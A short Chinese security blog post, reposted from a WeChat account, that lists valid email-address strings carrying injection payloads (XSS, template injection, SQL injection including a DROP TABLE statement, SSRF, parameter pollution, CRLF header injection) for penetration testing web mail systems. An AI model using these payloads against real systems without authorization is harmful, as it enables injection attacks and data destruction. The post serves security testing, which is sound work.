点击上方蓝字“Ots安全”一起玩耍
以下有效负载都是有效的电子邮件地址,我们不仅可以使用这些地址对基于 Web 的电子邮件系统进行渗透测试。
XSS(跨站脚本):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
模板注入:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
SQL注入:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
SSRF(服务器端请求伪造):
[email protected]
john.doe@[127.0.0.1]
参数污染:
victim&[email protected]
(电子邮件)标头注入:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>rnRCPT TO:<victim+"@test.com
原文始发于微信公众号(Ots安全):电子邮件地址有效载荷
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论